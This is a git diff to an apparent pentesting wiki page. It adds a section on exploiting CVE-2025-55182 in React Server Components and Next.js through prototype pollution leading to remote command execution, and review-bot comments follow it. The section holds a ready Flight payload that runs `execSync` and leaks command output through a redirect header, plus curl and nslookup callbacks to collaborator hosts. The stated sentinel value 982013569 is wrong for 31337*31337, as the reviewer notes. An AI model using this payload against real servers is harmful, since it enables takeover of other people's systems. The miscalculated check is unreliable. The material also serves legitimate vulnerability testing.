diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md index 50f30e6f5af..2bba1d5945f 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md 
@@ -747,6 +747,55 @@ Object.prototype.env = { require("./usage.js") ``` +## React Server Components Flight PP2RCE (CVE-2025-55182) + +React Server Components (RSC) exchange component trees over the Flight protocol, which is typically transported as `multipart/form-data` where each part contains JSON-like chunks with `$:` references. In React `19.0.0–19.2.0` / Next.js `15.0.4–16.0.6` the server-side resolver lets attackers point those references at magic properties such as `__proto__`, enabling prototype pollution that quickly escalates to arbitrary JavaScript and OS command execution inside the Node.js worker. For enumerating exposed RSC endpoints, see the [NextJS pentesting notes](../../../network-services-pentesting/pentesting-web/nextjs.md). + +### Flight exploitation flow + +1. **Reach an RSC endpoint** (usually identified by a `Next-Action` header and `react-server-dom-webpack` content-type) and send a crafted multipart POST that Flight will deserialize. +2. **Pollute core prototypes** by assigning references such as `"then": "$1:__proto__:then"`. When the resolver walks that path it writes a controllable `then` into `Object.prototype`, giving the attacker influence over subsequent promise/thenable handling. +3. **Pivot to the global `Function` constructor** by pointing `_response._formData.get` at `"$1:constructor:constructor"`. When the runtime later calls `_formData.get()` it actually runs `Function()`. +4. **Execute Node primitives via `_response._prefix`**, e.g. `process.mainModule.require('child_process').execSync('COMMAND')`, to spawn OS commands under the Next.js worker account. +5. **Exfiltrate command output** by throwing a `NEXT_REDIRECT` error whose `digest` is `NEXT_REDIRECT;push;/login?a=${res};307;`. Next.js forwards this into the `x-action-redirect` header of the HTTP 303 response, so attackers instantly see their command output. 
+ +### Example Flight chunk + +```json +{ + "then": "$1:__proto__:then", + "status": "resolved_model", + "reason": -1, + "value": "{\"then\":\"$B1337\"}", + "_response": { + "_prefix": "var res=process.mainModule.require('child_process').execSync('COMMAND').toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});", + "_chunks": "$Q2", + "_formData": { "get": "$1:constructor:constructor" } + } +} +``` + +### Safe verification primitives + +- **In-band math PoC (Unix-like):** Execute `echo $((31337*31337))` via `execSync`. The result `982013569` must appear inside the `x-action-redirect` header of a `303` response together with the `NEXT_REDIRECT` digest, proving arbitrary command execution without touching the filesystem or network. +- **Windows-safe PoC:** Swap the payload to `powershell -c "31337*31337"`. The same `982013569` sentinel flowing through `x-action-redirect` proves a vulnerable Windows Node.js host. +- **Out-of-band validation:** When WAF/CDN layers strip headers or responses, run a command like `nslookup .burpcollaborator.net` (or `curl https://.oastify.com`) from `_prefix`. Any DNS/HTTP interaction observed by the collaborator confirms exploitation even if the HTTP response is empty. + +### Burp Bounty Pro detection profiles + +Use **Extensions → Burp Bounty Pro → About → Check For Updates** to pull three purpose-built checks: + +- `CVE-2025-55182_React2Shell_RCE` – in-band profile that injects the Unix math command, watches for `303` redirects, and flags hosts only when `x-action-redirect` contains `982013569` to minimize false positives. +- `CVE-2025-55182_React2Shell_RCE_OOB` – identical Flight payload structure but executes a collaborator callback so blind deployments or aggressively sanitized responses still register as RCE via Burp Collaborator events. 
+- `CVE-2025-55182_React2Shell_RCE_Windows` – reuses the math technique with a PowerShell expression to safely test Windows-based Next.js stacks. + +### Operational workflow + +1. Run the in-band profile first for fast confirmation; it needs only a single HTTP request. +2. If headers/body are missing or WAF interference is suspected, immediately repeat with the OOB profile and monitor Burp Collaborator. +3. When targeting Windows infrastructure, add the Windows profile to confirm code execution using native tooling. + + ## VM Gadgets In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\ @@ -779,6 +828,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c - [https://portswigger.net/research/prototype-pollution-node-no-filesystem](https://portswigger.net/research/prototype-pollution-node-no-filesystem) - [https://www.nodejs-security.com/blog/2024/prototype-pollution-regression](https://www.nodejs-security.com/blog/2024/prototype-pollution-regression) - [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution) +- [CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro](https://bountysecurity.ai/blogs/news/cve-2025-55182-react2shell-new-detection-profiles-for-burp-bounty-pro) {{#include ../../../banners/hacktricks-training.md}}
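Review bot: The sentinel `982013569` used in the "Safe verification primitives" bullets and in the `CVE-2025-55182_React2Shell_RCE` / `_Windows` profile descriptions of the first hunk is not the product of `31337*31337`; 31337 × 31337 = 982007569, so `echo $((31337*31337))` and `powershell -c "31337*31337"` both return `982007569`, and a check that "flags hosts only when `x-action-redirect` contains `982013569`" can never fire. Correct the constant everywhere it appears (both PoC bullets and both profile bullets) or pick a sentinel the reader can verify at a glance, e.g. `echo $((1337*1337))` with expected `1787569`. Smaller points in the same hunk: (1) the out-of-band commands `nslookup .burpcollaborator.net` and `curl https://.oastify.com` have an empty leftmost label, which reads like a stripped placeholder; write `<id>.oastify.com` so readers know to substitute their Collaborator subdomain. (2) Step 5 says the digest `NEXT_REDIRECT;push;/login?a=${res};307;` surfaces in a `303` response; say explicitly that `307` is the status field inside the digest while `303` is the status of the server-action response, otherwise the pair reads as a typo. (3) `/login?a=${res}` puts raw command output into a URL and a response header; output containing `&`, `#`, `%`, newlines or non-ASCII will be truncated or mangled, so wrap it (`encodeURIComponent(res)` or `Buffer.from(res).toString('base64')`) and mention that header length limits on the proxy/CDN path can still cut it. (4) `process.mainModule.require(...)` is deprecated (DEP0138) and is `undefined` when the worker entry point is an ES module; state that the `_prefix` payload assumes a CommonJS entry point. (5) The "Example Flight chunk" references `$Q2`, `$B1337` and `$1:...` but is shown as a lone JSON object, while the prose says Flight arrives as `multipart/form-data` parts; show the full request (which form field carries this chunk, what parts `1` and `2` contain, the `Next-Action` header value) so the flow is reproducible rather than illustrative. (6) The affected ranges `19.0.0–19.2.0` / `15.0.4–16.0.6` are given without the fixed releases; add the patched versions and cite the upstream advisory rather than relying on the vendor blog alone.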
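Review bot: In the second hunk the only reference added for CVE-2025-55182 is the Burp Bounty Pro vendor post, which documents a commercial detection profile rather than the vulnerability itself; the new section's version ranges and exploitation steps should be backed by the primary sources (the React / Next.js security advisory and the CVE record), so add those alongside it. Also keep the list's existing entry style, a bare `[url](url)` as in the three neighbouring PortSwigger / nodejs-security lines, instead of introducing a titled markdown link for this one entry.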